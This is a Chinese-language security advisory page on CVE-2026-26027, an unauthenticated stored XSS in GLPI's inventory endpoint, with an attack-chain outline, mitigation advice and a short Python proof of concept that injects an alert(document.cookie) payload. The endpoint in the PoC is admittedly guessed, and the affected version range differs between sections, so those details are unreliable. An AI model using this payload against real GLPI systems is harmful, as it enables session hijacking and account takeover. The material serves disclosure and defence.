IPBUF安全漏洞报告
English
CVE-2026-26027 CVSS 7.5 高危

CVE-2026-26027 GLPI存储型XSS漏洞

披露日期: 2026-04-06
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-26027
漏洞类型
存储型XSS
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
GLPI

相关标签

XSS存储型XSSGLPICVE-2026-26027无需认证IT资产管理

漏洞概述

GLPI是一款广泛使用的IT资产及服务管理软件。在11.0.0至11.0.6版本中,系统存在严重的存储型跨站脚本漏洞(XSS)。未经身份验证的远程攻击者可利用库存接口注入恶意脚本,这些脚本会被持久化存储在服务器上。当管理员或其他用户访问受感染的资产页面时,恶意代码将在浏览器中执行,进而导致会话劫持、账户接管或敏感信息泄露。

技术细节

该漏洞源于GLPI库存端点在处理用户输入时缺乏严格的安全过滤。攻击者无需任何认证权限(PR:N),即可构造包含恶意JavaScript代码的HTTP POST请求发送至受影响端点。由于系统未对输入数据进行有效的转义或清洗,恶意载荷被直接存入数据库。CVSS向量显示攻击需要一定的用户交互(UI:R),即受害者需浏览特定页面才会触发。当具有高权限的用户查看被污染的资产列表或详情时,嵌入的脚本将在其浏览器上下文中运行。鉴于机密性、完整性和可用性影响均为高(C:H/I:H/A:H),攻击者可利用此漏洞窃取管理凭证、篡改系统数据或执行恶意操作,严重威胁企业IT管理系统的安全。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描网络,识别出运行GLPI 11.0.0至11.0.6版本的目标系统,并确认其库存接口可访问。
STEP 2
2. 载荷构造
攻击者编写包含恶意JavaScript代码的XSS Payload,旨在窃取Cookie或执行未授权操作。
STEP 3
3. 恶意注入
攻击者向GLPI的库存端点发送特制的HTTP POST请求,将XSS Payload存入数据库,无需登录。
STEP 4
4. 触发漏洞
系统管理员或普通用户在浏览系统资产列表或详情时,加载了包含恶意脚本的内容。
STEP 5
5. 执行攻击
恶意脚本在受害者浏览器中执行,窃取Session ID或以受害者身份执行管理命令。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "http://example.com/glpi/api/inventory.php" # Vulnerable endpoint based on advisory # Malicious XSS payload xss_payload = '<img src=x onerror=alert(document.cookie)>' # Construct data payload for inventory injection data = { "itemtype": "Computer", "name": xss_payload, "entities_id": 0 } try: # Send the request without authentication (PR:N) response = requests.post(target_url, json=data) if response.status_code == 200: print("[+] Payload injected successfully.") print("[+] Check the inventory interface to trigger the XSS.") else: print(f"[-] Injection failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

影响范围

GLPI >= 11.0.0, < 11.0.6

防御指南

临时缓解措施
若无法立即升级,建议暂时关闭或通过防火墙严格限制对库存端点的外部访问,仅允许受信任的内网IP调用。管理员在审查资产数据时应提高警惕,避免在不可信环境下登录管理后台,并定期检查系统日志中是否存在异常的数据提交记录。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表